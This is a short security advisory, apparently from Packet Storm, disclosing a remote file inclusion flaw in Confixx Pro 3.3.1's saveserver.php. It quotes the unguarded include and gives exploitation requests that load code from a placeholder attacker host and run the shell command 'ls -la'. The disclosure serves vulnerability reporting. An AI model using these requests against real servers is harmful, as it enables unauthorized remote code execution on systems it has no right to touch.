Confixx pro versions 3.3.1 and below suffer from a remote file inclusion vulnerablity in saveserver.php.
acad98881a3c7ecc317be62929385547bfa0ee8b227cc6817d45b135166e8862[*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
__________________________________________________________________________
[!] Application homepage : http://www.swsoft.com/de/products/confixx/
[!] Author : H4 / XPK
[!] Contact : http://xpkzxc.com/
[!] Bug discovered : 2007-07-21
[!] Bug published : 2007-07-24
[!] Risk : Moderate
Do not forget visit our page for new vulnerabilites , information and tools.
---------------------------------------------------------------------
Vuln. code: admin/business_inc/saveserver.php
Lines 8-11
if( !in_array($returnto, $actions) )
{
include( $thisdir . "/business_inc/list.php" );
}
Variable $thisdir is not defined ...
---------------------------------------------------------------------
An attacker does not need to be authenticated to access this file.
[!] Conditions: open_basedir restriction off and allow_url_fopen = on
[!] Exploitation : http://[target]/admin/business_inc/saveserver.php
Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la
Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la
---------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed